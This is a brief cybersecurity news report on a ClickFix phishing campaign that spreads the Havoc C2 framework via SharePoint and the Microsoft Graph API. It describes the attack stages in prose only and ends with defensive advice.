In February 2025, it became known about the arrest of a 39-year-old hacker who had committed numerous leaks of personal data over several years.
81 
Cybercriminals are using a new phishing technique called ClickFix to covertly distribute Havoc C2 via SharePoint. Researchers from Fortinet ForEGuard Labs have discovered that attackers are using the Microsoft Graph API, which allows them to disguise malicious activity as legitimate requests.
The attack begins by sending out phishing emails with an attached HTML file called “Documents.html” that opens a fake error page. The user is prompted to manually execute a malicious PowerShell command that triggers the next stage of the attack. This script checks the runtime environment and, if the system is not sandboxed, loads a Python interpreter and runs a script that acts as a KaynLdr malware loader. This allows Havoc C2 to gain control of the infected device, execute commands, download files, and manipulate access tokens.
Havoc C2 is an open source alternative to Cobalt Strike. It is used by hackers to remotely control systems, bypass antivirus protection, and steal data.
Similar methods have been used before, including in phishing campaigns through Google advertising platforms aimed at stealing PayPal credentials.
Attackers continue to improve their techniques for stealthily launching malware, using trusted services to bypass protection. Companies are advised to strengthen security measures, including blocking the automatic execution of PowerShell scripts and carefully checking the origin of attachments in emails.
81 
83 
70